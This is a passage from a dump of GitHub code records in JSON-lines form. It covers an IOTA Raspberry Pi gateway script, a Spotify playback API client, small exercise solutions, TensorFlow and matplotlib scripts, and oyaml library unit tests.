file\n file_path = '.ecc/privateKey.pem'\n if os.path.exists(file_path) == False:\n # Create new privateKey\n privateKey = PrivateKey()\n privateKeyPem = privateKey.toPem()\n \n f = open(file_path, \"w\")\n f.write(privateKeyPem)\n f.close()\n\n#=======================================================================\n# Function to act based on input command in API\n# Parameter:\n# - command : command to do\n# - parameter_value : value to input in command\n# - return_topic : topic used to send MQTT\n#=======================================================================\ndef do_command(command, parameter_value, return_topic, set_tag=gateway_name):\n # convert compressed public key to PEM format\n if command == 'convert_to_pem':\n try :\n compressedPublicKey = parameter_value\n convert_publicKey = PublicKey.fromCompressed(compressedPublicKey)\n publicKey_pem = convert_publicKey.toPem()\n send_mqtt(publicKey_pem, return_topic)\n except ValueError :\n send_mqtt(\"Error to convert compressed public key to PEM format\", return_topic)\n \n # get data section of a message\n if command == 'data':\n try :\n parameter_value = parameter_value.replace(\"'\", '\"')\n upload(parameter_value, gateway_name)\n send_mqtt(tangle_msg_id, return_topic)\n except ValueError :\n send_mqtt(\"Error to upload to Tangle\", return_topic)\n \n # Upload data with specified tag index\n elif command == 'data_special':\n try :\n parameter_value = parameter_value.replace(\"'\", '\"')\n upload(parameter_value, set_tag)\n send_mqtt(tangle_msg_id, return_topic)\n except ValueError :\n send_mqtt(\"Error to upload to Tangle\", return_topic)\n \n # get list of message_id based on indexation name\n elif command == 'tag':\n try :\n return_data = str(client.get_message_index(parameter_value))\n except ValueError :\n return_data = \"Tag not found\"\n send_mqtt(return_data, return_topic)\n\n # Original data from IOTA Tangle\n elif command == 'msg_data':\n try : \n return_data = str(client.get_message_data(parameter_value))\n except ValueError:\n return_data = \"Message ID not found\"\n send_mqtt(return_data, return_topic)\n \n # original metadata from IOTA Tangle\n elif command == 'msg_metadata':\n try:\n return_data = str(client.get_message_metadata(parameter_value))\n except ValueError:\n return_data = \"Message ID not found\"\n send_mqtt(return_data, return_topic)\n \n # get list of message in tag index\n elif command == 'tag_msg':\n try :\n # get list of \n msg_id_list= client.get_message_index(parameter_value)\n msg_count = len(msg_id_list)\n return_data = \"[\"\n \n # get payload for every message ID\n for i in range(msg_count):\n full_data = client.get_message_data(msg_id_list[i]) \n payload_byte = full_data[\"payload\"][\"indexation\"][0][\"data\"]\n msg=''\n for x in range(len(payload_byte)):\n msg += chr(payload_byte[x])\n return_data += \"[\" + msg + \"]\"\n if i < msg_count-1:\n return_data += \",\"\n \n return_data += \"]\"\n return_data = return_data.replace('\"', \"'\")\n except ValueError :\n return_data = \"Tag not found\"\n \n send_mqtt(return_data, return_topic)\n \n # Only payload message from IOTA Tangle\n elif command == 'payload':\n try :\n # get the payload section\n full_data = client.get_message_data(parameter_value) \n payload_byte = full_data[\"payload\"][\"indexation\"][0][\"data\"]\n return_data=''\n for x in range(len(payload_byte)):\n return_data += chr(payload_byte[x])\n except ValueError:\n return_data = \"Not Valid Payload or Message ID\"\n return_data = return_data.replace('\"', \"'\")\n 
send_mqtt(return_data, return_topic)\n        \n    # Only valid messages from this gateway\n    elif command == 'payload_valid':\n        try : \n            # get the payload section\n            full_data = client.get_message_data(parameter_value)    \n            payload_byte = full_data[\"payload\"][\"indexation\"][0][\"data\"]\n            full_message=''\n            for x in range(len(payload_byte)):\n                full_message += chr(payload_byte[x])    \n            \n            # extract message\n            msg_start_index = full_message.find(\"message\") - 1\n            msg_end_index = full_message.find(\"publicKey\") - 2\n            message = full_message[msg_start_index:msg_end_index]\n            \n            # get signature\n            data_json = json.loads(full_message)\n            signature = data_json[\"signature\"]\n\n            # get this gateway publicKey\n            privateKey = PrivateKey.fromPem(File.read(\".ecc/privateKey.pem\"))\n            publicKey = privateKey.publicKey()\n            \n            # ECDSA verification\n            signatureToVerify = Signature.fromBase64(signature)\n            if Ecdsa.verify(message, signatureToVerify, publicKey):\n                return_data = message.replace('\"', \"'\")\n            else:\n                return_data = \"Not a Payload from This Gateway\"\n        except ValueError:\n            return_data = \"Not a Valid Payload or Message ID\"\n        send_mqtt(return_data, return_topic)\n    \n#=======================================================================\n# Main program\n# In first run, it will:\n# - Create Random Private and Public Key\n# \n# Next, it will act based on input command from MQTT input.\n# Command List :\n# - data : upload data to IOTA Tangle. (input: JSON data)\n# - tag : get list of msg_id from input index. (input : indexation name)\n# - msg_data : get full data of msg. (input : message id)\n# - msg_metadata : get metadata of msg. (input : message id)\n# - payload : get payload of message. (input : message id)\n# - payload_valid : get payload of a message that was uploaded via \n# this gateway. 
(input: message_id)\n#=======================================================================\nif __name__ == \"__main__\":\n    # Configure ECDSA\n    ECDSA_begin()\n    \n    # Test connection with permanode\n    client = iota_client.Client(nodes_name_password=[[chrysalis_url]])\n    print(client.get_info())\n    \n    # Stop previous session\n    # It is necessary to prevent duplicate input messages in temp.txt\n    os.system('pkill -f server-mqtt.py')\n    subprocess.Popen([\"python3\", \"server-mqtt.py\"])\n    \n    while True:\n        # Open temp.txt API\n        f = open(\"temp.txt\", \"r+\")\n        answer_line = f.readline().strip('\\n')\n        \n        # if none, skip to restart\n        if answer_line == \"\":\n            continue\n\n        # if there is a message to act on,\n        # read the first row and delete it\n        lines = f.readlines()\n        f.seek(0)\n        f.truncate()\n        f.writelines(lines[1:])\n        f.close()\n        \n        # if the message command format is not fulfilled, skip\n        # format must be \"command/data_parameter/mqtt_return_topic\"\n        # if the format is correct, parse the message command as 3 parameters\n        if '/' not in answer_line:\n            continue\n        \n        parsing_data = answer_line.split('/')\n        \n        if len(parsing_data) != 3 and len(parsing_data) != 4:\n            continue\n        \n        # Three command style\n        if len(parsing_data) == 3:\n            input_command = parsing_data[0]\n            input_parameter_value = parsing_data[1]\n            topic = parsing_data[2].strip(\"'\")\n            specified_tag = gateway_name\n\n        # Four command style\n        if len(parsing_data) == 4:\n            input_command = parsing_data[0]\n            specified_tag = parsing_data[1]\n            input_parameter_value = parsing_data[2]\n            topic = parsing_data[3].strip(\"'\")\n        \n        # Dispatch the message based on its command\n        do_command(input_command, input_parameter_value, topic, specified_tag)\n","repo_name":"SuryaAssistant/iota-raspberrypi-gateway","sub_path":"src/armv7l/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"16393441936","text":"from printStyle import *\n\n\nclass Translation:\n    def __init__(self, path=\"Data/languages.csv\"):\n        try:\n            with open(path, \"r\", encoding=\"utf-8-sig\") as f:\n                self.lines = f.read()\n            self.lines = self.lines.split(\"\\n\")\n            self.lines = [line.split(\",\") for line in self.lines]\n            self.languageList = self.lines[0]\n        except FileNotFoundError:\n            printError(f\"File {path} not found. App will be using English\")\n            self.lines = []\n            self.languageList = []\n\n    def Translate(self, language, text):\n        try:\n            index = self.languageList.index(language)\n            try:\n                for line in self.lines:\n                    if line[0] == text:\n                        return line[index]\n                printWarning(f\"Text {text} not found. Returning english text\")\n                return text\n            except IndexError:\n                printWarning(f\"Text {text} not found. Returning english text\")\n                return text\n        except ValueError:\n            if self.languageList:\n                printWarning(f\"Language {language} not found. Returning english text\")\n            else:\n                printWarning(f\"Language {language} not found as CSV couldn't be found. 
Returning english text\")\n return text\n","repo_name":"MM4096/Translator","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21806601654","text":"def mood():\n print(\"How are you?\")\n\nprint(\"Lalalal\")\nprint(\"Dzień dobry\")\nmood()\nmood()\nmood()\n\n\ndef my_mood(answear):\n print(\"My mood today:\")\n print(answear)\n\nresp = input(\"How are you?\")\nmy_mood(resp)\n\ndef my_mood(answear):\n return answear * 2\n\n\nresp = input(\"How are you?\")\ntwiced = my_mood(resp)\nprint(\"My mood is like\", twiced)\n","repo_name":"damiankiwi/kurs_python","sub_path":"04_functions/FUNCTIONS.py","file_name":"FUNCTIONS.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34843527948","text":"from data import load_certificate, load_wav_16k_mono\n\nimport tensorflow as tf\n\n\ndef inference():\n true = 0\n false = 0\n flag = true\n result_csv_path = \"./result.csv\"\n new = open(result_csv_path, \"a\")\n new.write(\"filename,ground truth,predicted,result\\n\")\n\n sleep_scoring_path = 'C:/Users/AllyHyeseongKim/PycharmProjects/Sleep-Stage-Classification/certificate/dataset/audio/'\n dataset, map_classes = load_certificate(path=sleep_scoring_path)\n print(dataset)\n\n saved_model_path = '../results/sleep_sound_model/class 4/sample'\n saved_model = tf.saved_model.load(saved_model_path)\n\n for test_data in dataset.to_numpy():\n filename = test_data[0]\n label = int(test_data[2])\n wav = load_wav_16k_mono(filename)\n model_result = saved_model(wav)\n pred = tf.argmax(model_result).numpy()\n\n if label == pred:\n true += 1\n flag = \"true\"\n else:\n false += 1\n flag = \"false\"\n\n filename = \"/\".join(filename.split(\"/\")[-2:])\n new.write(filename + \",\" + map_classes[label] + \",\" + map_classes[pred] + \",\" + flag + \"\\n\")\n\n accuracy = true/(true+false)*100\n print(f\"Test Accuracy: {accuracy}%\")\n new.write(\"\\n\")\n new.write(\"\\n\")\n new.write(\"result,\" + str(accuracy) + \"%\\n\")\n\n new.close()\n","repo_name":"AllyHyeseongKim/Sleep-Stage-Classification","sub_path":"certificate/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"72707420271","text":"from itertools import zip_longest\nfrom collections import defaultdict\n\ndef isAnagram(s: str, t: str) -> bool:\n count = defaultdict(int)\n for i, j in zip_longest(s, t):\n count[i] += 1\n count[j] -= 1\n\n return all(not i for i in count.values())\n\nprint(isAnagram(\"a\", \"ab\"))\n# print(isAnagram(\"anagram\", \"nagaram\"))\n","repo_name":"antidoid/DSA","sub_path":"problems/242.py","file_name":"242.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14260274719","text":"from pathlib import Path\nimport plot_and_process_utils as ppu\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nimport matplotlib.pylab as pylab\nprint(pylab.rcParams.keys())\nparams = { 'axes.labelsize':18,\n 'axes.titlesize':20,\n 'figure.titlesize':20,\n 'xtick.labelsize':14,\n 'ytick.labelsize':14}\npylab.rcParams.update(params)\n\n\ndbin_path = Path(str(os.getcwd())).parent.parent / 'dbins'\n\nprint(dbin_path.absolute())\n\ndbin_fnames = [\n 
'1al1-sf_paper_qcorrel',\n '1cos-sf_paper_qcorrel',\n# '4osd-sf_paper_qcorrel'\n]\n\nqmaxs = [0.3699, 0.3699]\n\n\nnQ = 256\nnTheta =360\n\ntmax =180\n\n\n\nfor dbin_fname, qmax in zip(dbin_fnames, qmaxs):\n t_space = np.linspace(0,tmax, nTheta)\n q_space = np.linspace(0,qmax, nQ)\n\n tscale, qscale = np.meshgrid(t_space, q_space)\n try:\n qvol = ppu.read_dbin(str(dbin_path/f'{dbin_fname}'), nQ, nTheta)\n except FileNotFoundError:\n print(f'File {dbin_fname} Not Found: Skipping')\n continue\n\n\n \n\n\n r1r2 = ppu.extract_r1r2(qvol)\n\n\n r1r2 = r1r2**(0.25)\n \n r1r2 = ppu.convolve_gaussian(r1r2, 2,2)\n\n r1r2 -= np.min(r1r2)\n r1r2 /= np.max(r1r2)\n\n # ppu.plot_map(r1r2,aspect='auto', title=f'{dbin_fname[:4].upper()} - $q$ Space Correlation',\n # extent=[0,tmax,0,qmax], xlabel='$\\\\theta$ / $ ^{\\circ}$',fig_size=(8,5.5), \n # ylabel='$q_1=q_2$ / $\\AA^{-1}$', save=f'{dbin_fname[:4]}_q1q2_rv' , cmap='viridis')\n plt.figure(figsize=(8,5.5), dpi=100)\n plt.suptitle(f'{dbin_fname[:4].upper()} - $q$ Space Correlation')\n ax1 = plt.subplot(2,2,3)\n\n plt.imshow(r1r2, cmap='viridis', aspect='auto', extent=[0,tmax,0,qmax], origin='lower')\n plt.xlim(0,180)\n plt.ylim(0, qmax)\n\n # plt.title(f'{dbin_fname[:4].upper()} - $q$ Space Correlation')\n plt.xlabel('$\\\\theta$ / $ ^{\\circ}$')\n plt.ylabel('$q_1=q_2$ / $\\AA^{-1}$')\n\n ax2 = plt.subplot(2,2,4)\n # ax2.set_title('Mean Inten.($q$)')\n plt.plot(np.average(r1r2,axis=1), q_space)\n plt.ylim([0, qmax])\n plt.xlim([0, np.max(np.average(r1r2,axis=1))])\n # plt.gca().invert_yaxis()\n # plt.gca().invert_xaxis()\n\n # plt.xlabel('$q_1=q_2$ / $\\AA^{-1}$')\n plt.xticks([])\n plt.yticks([])\n plt.xlabel('Mean Inten.($q$)')\n\n\n ax2 = plt.subplot(2,2,1)\n # ax2.set_title('Mean Inten.($\\\\theta$)')\n plt.plot(t_space, np.average(r1r2,axis=0))\n plt.xlim([0, 180])\n plt.ylim([0, np.max(np.average(r1r2,axis=0))])\n\n # plt.xlabel('$\\\\theta$ / $ ^{\\circ}$')\n plt.xticks([])\n plt.yticks([])\n plt.subplots_adjust(wspace=0,\n hspace=0.0)\n plt.ylabel('Mean Inten.($\\\\theta$)')\n\n\n\n # plt.colorbar()\n plt.savefig(f'{dbin_fname[:4]}_q1q2_rv' )\n\n\n# plt.plot(t_space, 3.5175*t_space**(-1.038291), 'r,')\n\n \n\nplt.show()\n\n","repo_name":"YellowSub17/qcorrel","sub_path":"plotting/paper_plots/q1q2_revis.py","file_name":"q1q2_revis.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40600813736","text":"class Solution:\n def validMountainArray(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: bool\n \"\"\"\n lenA = len(A)\n if lenA <= 2:\n return False\n\n max_pos = A.index(max(A))\n if max_pos == 0 or max_pos == lenA - 1:\n return False\n\n left, right = A[0:max_pos], A[max_pos:lenA]\n if sorted(list(set(left))) == left and sorted(list(set(right))) == right[::-1]: \n return True\n\n return False\n \t\n \n# A = [2,1]\n# A = [3,5,5]\n# A = [0,3,2,1]\n# A = [1,7,9,5,4,1,2]\nA = [4,20,32,45,49,45,31,21,20,16,11,8]\ns = Solution()\nr = s.validMountainArray(A)\nprint(r)\n ","repo_name":"Rosevil1874/LeetCode-Solution-Python-Java","sub_path":"Python-Solution/941_Valid-Mountain-Array/941.py","file_name":"941.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"38"} +{"seq_id":"35007596269","text":"from datetime import datetime, timedelta\nfrom spotify_secrets import DEVICE_ID, CLIENT_ID, CLIENT_SECRET, REFRESH_TOKEN\nimport requests\n\n# Methods (available to use):\n# 
RETURN VALUES\n# ERROR: returns \"ERROR\" or \"CONNECTION_ERROR\"\n# NO ERROR: returns \"SUCCESS\"\n\n# starts/resumes the playback\n# start_playback()\n\n# pauses the playback\n# pause_playback()\n\n# skips to the next song and plays it\n# skip_playback()\n\n# goes back to a previous song and plays it\n# previous_playback()\n\n# return playing status of device\n# is_playing()\n\n# Change playback volume \n# parameter: increment - signed int {change volume by the increment value}\n# change_volume(increment):\n\nclass _Helper:\n    # Token info storage\n    access_token = None\n    token_expiration = None\n\n    # Return header info for API calls\n    @staticmethod\n    def get_headers():\n        return {\n            'Authorization': f\"Bearer {_Helper.access_token}\"\n        }\n    \n    # Return header info for Volume calls \n    @staticmethod\n    def get_volume_header():\n        return {\n            'Accept': 'application/json',\n            'Content-Type': 'application/json',\n            'Authorization': f\"Bearer {_Helper.access_token}\",\n        }\n    \n    # Return DEVICE_ID in a json\n    @staticmethod\n    def get_device_json():\n        return {\n            'device_ids': [\n                f'{DEVICE_ID}',\n            ],\n        }\n    \n    # Return the new volume and DEVICE_ID in a json\n    @staticmethod\n    def set_volume_json(new_vol):\n        return {\n            'volume_percent' : f\"{new_vol}\",\n            'device_id' : f'{DEVICE_ID}',\n        }\n    \nclass _SpotifyConstants:\n    # URL endpoint for API calls\n    TOKEN_ENDPOINT = \"https://accounts.spotify.com/api/token\"\n    DEFAULT_URL = \"https://api.spotify.com/v1/me/player\"\n    DEVICES_ENDPOINT = f\"{DEFAULT_URL}/devices\"\n    START_PLAYBACK_ENDPOINT = f\"{DEFAULT_URL}/play?{DEVICE_ID}\"\n    PAUSE_PLAYBACK_ENDPOINT = f\"{DEFAULT_URL}/pause?{DEVICE_ID}\"\n    SKIP_TO_NEXT_ENDPOINT = f\"{DEFAULT_URL}/next?{DEVICE_ID}\"\n    SKIP_TO_PREVIOUS_ENDPOINT = f\"{DEFAULT_URL}/previous?{DEVICE_ID}\"\n    VOLUME_ENDPOINT = f\"{DEFAULT_URL}/volume?{DEVICE_ID}\"\n\n    # Standard return values\n    # For status codes other than 200 and 201\n    ERROR = 'ERROR' \n    CONNECTION_ERROR = 'CONNECTION_ERROR'\n    SUCCESS = 'SUCCESS'\n\n# Refresh Token\ndef __refresh_token(bypass_check=False):\n    # Check if refresh is necessary\n    if (_Helper.token_expiration and not bypass_check):\n        # If current time is still under expiration time, no need to refresh token\n        if (datetime.now() < _Helper.token_expiration):\n            return _SpotifyConstants.SUCCESS\n    # Otherwise, refresh token\n    # Generate aspects of API call\n    payload = {\n        'grant_type': 'refresh_token',\n        'refresh_token': f'{REFRESH_TOKEN}',\n        'client_id': f'{CLIENT_ID}',\n        'client_secret': f'{CLIENT_SECRET}'\n    }\n    headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n\n    # Make API call\n    try:\n        response = requests.post(_SpotifyConstants.TOKEN_ENDPOINT, headers=headers, data=payload)\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    # Check API response\n    if response and response.status_code == 200:\n        json_data = response.json()\n        if (json_data and 'access_token' in json_data and 'expires_in' in json_data):\n            _Helper.access_token = json_data['access_token']\n            _Helper.token_expiration = datetime.now() + timedelta(seconds = int(json_data['expires_in'])-10)\n            return _SpotifyConstants.SUCCESS\n        else:\n            return _SpotifyConstants.ERROR\n    else:\n        return _SpotifyConstants.ERROR\n\n# Start Playback (private)\ndef __start_playback():\n    # Check token\n    __refresh_token()\n\n    # Generate aspects of API call\n    headers = _Helper.get_headers()\n    \n    # set device to be active via API call if it is not already\n    set_active_device = __get_device_info()\n    if set_active_device:\n        error_status = __set_active_device()\n        if error_status in [_SpotifyConstants.ERROR, _SpotifyConstants.CONNECTION_ERROR]:\n            return error_status\n    \n    # Make API call\n    try:\n        response = requests.put(_SpotifyConstants.START_PLAYBACK_ENDPOINT, headers=headers, data={})\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    # Check API response\n    if (response.status_code == 202):\n        return _SpotifyConstants.SUCCESS\n    else:\n        return _SpotifyConstants.ERROR\n\n# Pause Playback (private)\ndef __pause_playback():\n    # Check token\n    __refresh_token()\n\n    # Generate aspects of API call\n    headers = _Helper.get_headers()\n    \n    # Make API call\n    try:\n        response = requests.put(_SpotifyConstants.PAUSE_PLAYBACK_ENDPOINT , headers=headers, data={})\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    # Check API response\n    if (response.status_code == 202):\n        return _SpotifyConstants.SUCCESS\n    else:\n        return _SpotifyConstants.ERROR\n\n# Skip Playback (private)\ndef __skip_playback():\n    # Check token\n    __refresh_token()\n\n    # Generate aspects of API call\n    headers = _Helper.get_headers()\n    \n    # Make API call\n    try:\n        response = requests.post(_SpotifyConstants.SKIP_TO_NEXT_ENDPOINT, headers=headers, data={})\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    # Check API response\n    if (response.status_code == 202):\n        return _SpotifyConstants.SUCCESS\n    else:\n        return _SpotifyConstants.ERROR\n\n# Previous Playback (private)\ndef __previous_playback():\n    # Check token\n    __refresh_token()\n\n    # Generate aspects of API call\n    headers = _Helper.get_headers()\n    \n    # Make API call\n    try:\n        response = requests.post(_SpotifyConstants.SKIP_TO_PREVIOUS_ENDPOINT, headers=headers, data={})\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    # Check API response\n    if (response.status_code == 202):\n        return _SpotifyConstants.SUCCESS\n    else:\n        return _SpotifyConstants.ERROR\n    \n# return playing status of device\ndef __is_playing():\n    # Check token\n    __refresh_token()\n\n    # Generate aspects of API call\n    headers = _Helper.get_headers()\n    \n    # Make API call\n    try:\n        response = requests.get(f'{_SpotifyConstants.DEFAULT_URL}', headers=headers)\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    if (response.status_code == 200):    \n        return response.json()['is_playing']\n    else:\n        return _SpotifyConstants.ERROR\n    \n# change the playback volume by a given increment\ndef __change_volume(change_volume_by):\n    # Check token\n    __refresh_token()\n\n    # Generate aspects of API call\n    headers = _Helper.get_headers()\n    \n    _ , current_volume = __get_device_info()\n    current_volume += change_volume_by\n    \n    # Make API call\n    try:\n        response = requests.put(f'{_SpotifyConstants.VOLUME_ENDPOINT}', headers=headers, params=_Helper.set_volume_json(current_volume))\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    if (response.status_code == 204):    \n        return _SpotifyConstants.SUCCESS\n    else:\n        return _SpotifyConstants.ERROR\n\n# returns \"is_active\" state and \"volume_percent\" of raspberry pi device (private)\ndef __get_device_info():\n    # Check token\n    __refresh_token()\n\n    # Generate aspects of API call\n    headers = _Helper.get_headers()\n    \n    # Make API call\n    try:\n        response = requests.get(f'{_SpotifyConstants.DEVICES_ENDPOINT}', headers=headers)\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    transfer_playback = False\n    if (response.status_code == 200):    \n        for device in response.json()['devices']:\n            # raspberry pi found\n            if device['id'] == DEVICE_ID:\n                if not device['is_active']:\n                    transfer_playback = True\n                break\n          \n        return transfer_playback, device['volume_percent']\n    else:\n        return _SpotifyConstants.ERROR
\n    \n# sets the raspberry pi to be the active device (private)\ndef __set_active_device():\n    # Check token\n    __refresh_token()\n\n    # Generate aspects of API call\n    headers = _Helper.get_headers()\n    \n    # Make API call\n    try:\n        response = requests.put(_SpotifyConstants.DEFAULT_URL, headers=headers, json=_Helper.get_device_json())\n    except:\n        return _SpotifyConstants.CONNECTION_ERROR\n    \n    # Check API response\n    if (response.status_code == 202):\n        return _SpotifyConstants.SUCCESS\n    else:\n        return _SpotifyConstants.ERROR\n\n# Start Playback (public)\ndef start_playback():\n    return __start_playback()\n\n# Pause Playback (public)\ndef pause_playback():\n    return __pause_playback()\n\n# Skip Playback (public)\ndef skip_playback():\n    return __skip_playback()\n\n# Previous Playback (public)\ndef previous_playback():\n    return __previous_playback()\n\n# See if something is playing (public) \ndef is_playing():\n    return __is_playing()\n\n# Change playback volume by a certain increment (public) \ndef change_volume(change_volume_by):\n    return __change_volume(change_volume_by)\n","repo_name":"Zracano/Gesture-Recognition","sub_path":"spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":9135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38997299513","text":"import tensorflow as tf\r\nfrom tensorflow import keras\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.datasets import mnist # keras and tensor.keras are different\r\n(traindata, trainlabel), (testdata, testlabel) = mnist.load_data() # this checks whether kengo/.keras/data/mnist already exists\r\n\r\nprint(traindata.shape) # 60000×28×28\r\nprint(testdata.shape) # 10000×28×28\r\n\r\n# # display a single image\r\n# plt.contourf(traindata[0], cmap='gray')\r\n# plt.show()\r\n\r\nplt.figure(figsize=(10,10))\r\nfor i in range(25):\r\n    plt.subplot(5,5,i+1)\r\n    plt.xticks([])\r\n    plt.yticks([])\r\n    plt.grid(False)\r\n    plt.imshow(traindata[i], cmap=plt.cm.binary)\r\n    plt.xlabel(trainlabel[i])\r\nplt.show()","repo_name":"kennmasa28/for_share","sub_path":"TensorFlow/01_ClassifyImage/T0_show_mnist.py","file_name":"T0_show_mnist.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31680916375","text":"import math\nN = int(input())\nres=0\nfor n in range(N):\n\ta, b = [int(i) for i in input().split()]\n\ttemp = math.sqrt(a**2+b**2)\n\tif temp > res:\n\t\tres = temp\n\t\nprint('{:.2f}'.format(res))","repo_name":"Shanyao-HEU/PTA-PAT","sub_path":"pat-b/1063.py","file_name":"1063.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18119916149","text":"from collections import OrderedDict\nfrom types import GeneratorType\n\nimport pytest\nfrom yaml.constructor import ConstructorError\nfrom yaml.representer import RepresenterError\n\nimport oyaml as yaml\nfrom oyaml import _std_dict_is_order_preserving\n\n\ndata = OrderedDict([(\"x\", 1), (\"z\", 3), (\"y\", 2)])\n\n\ndef test_dump():\n    assert yaml.dump(data, default_flow_style=None) == \"{x: 1, z: 3, y: 2}\\n\"\n\n\ndef test_safe_dump():\n    assert yaml.safe_dump(data, default_flow_style=None) == \"{x: 1, z: 3, y: 2}\\n\"\n\n\ndef test_dump_all():\n    assert (\n        yaml.dump_all(documents=[data, {}], default_flow_style=None)\n        == \"{x: 1, z: 3, y: 2}\\n--- {}\\n\"\n    )\n\n\ndef test_dump_and_safe_dump_match():\n    mydict = {\"x\": 1, \"z\": 
2, \"y\": 3}\n # don't know if mydict is ordered in the implementation or not (but don't care)\n assert yaml.dump(mydict) == yaml.safe_dump(mydict)\n\n\ndef test_safe_dump_all():\n assert (\n yaml.safe_dump_all(documents=[data, {}], default_flow_style=None)\n == \"{x: 1, z: 3, y: 2}\\n--- {}\\n\"\n )\n\n\ndef test_load():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert loaded == {\"x\": 1, \"z\": 3, \"y\": 2}\n\n\ndef test_safe_load():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert loaded == {\"x\": 1, \"z\": 3, \"y\": 2}\n\n\ndef test_load_all():\n gen = yaml.safe_load_all(\"{x: 1, z: 3, y: 2}\\n--- {}\\n\")\n assert isinstance(gen, GeneratorType)\n ordered_data, empty_dict = gen\n assert empty_dict == {}\n assert ordered_data == data\n\n\n@pytest.mark.skipif(_std_dict_is_order_preserving, reason=\"requires old dict impl\")\ndef test_loads_to_ordered_dict():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert isinstance(loaded, OrderedDict)\n\n\n@pytest.mark.skipif(not _std_dict_is_order_preserving, reason=\"requires new dict impl\")\ndef test_loads_to_std_dict():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert not isinstance(loaded, OrderedDict)\n assert isinstance(loaded, dict)\n\n\n@pytest.mark.skipif(_std_dict_is_order_preserving, reason=\"requires old dict impl\")\ndef test_safe_loads_to_ordered_dict():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert isinstance(loaded, OrderedDict)\n\n\n@pytest.mark.skipif(not _std_dict_is_order_preserving, reason=\"requires new dict impl\")\ndef test_safe_loads_to_std_dict():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert not isinstance(loaded, OrderedDict)\n assert isinstance(loaded, dict)\n\n\nclass MyOrderedDict(OrderedDict):\n pass\n\n\ndef test_subclass_dump():\n data = MyOrderedDict([(\"x\", 1), (\"y\", 2)])\n assert \"!!python/object/apply:test_oyaml.MyOrderedDict\" in yaml.dump(data)\n with pytest.raises(RepresenterError, match=\"cannot represent an object\"):\n yaml.safe_dump(data)\n\n\ndef test_anchors_and_references():\n text = \"\"\"\n defaults:\n all: &all\n product: foo\n development: &development\n <<: *all\n profile: bar\n\n development:\n platform:\n <<: *development\n host: baz\n \"\"\"\n expected_load = {\n \"defaults\": {\n \"all\": {\"product\": \"foo\"},\n \"development\": {\"product\": \"foo\", \"profile\": \"bar\"},\n },\n \"development\": {\n \"platform\": {\"host\": \"baz\", \"product\": \"foo\", \"profile\": \"bar\"}\n },\n }\n assert yaml.safe_load(text) == expected_load\n\n\ndef test_omap():\n text = \"\"\"\n Bestiary: !!omap\n - aardvark: African pig-like ant eater. Ugly.\n - anteater: South-American ant eater. Two species.\n - anaconda: South-American constrictor snake. Scaly.\n \"\"\"\n expected_load = {\n \"Bestiary\": (\n [\n (\"aardvark\", \"African pig-like ant eater. Ugly.\"),\n (\"anteater\", \"South-American ant eater. Two species.\"),\n (\"anaconda\", \"South-American constrictor snake. 
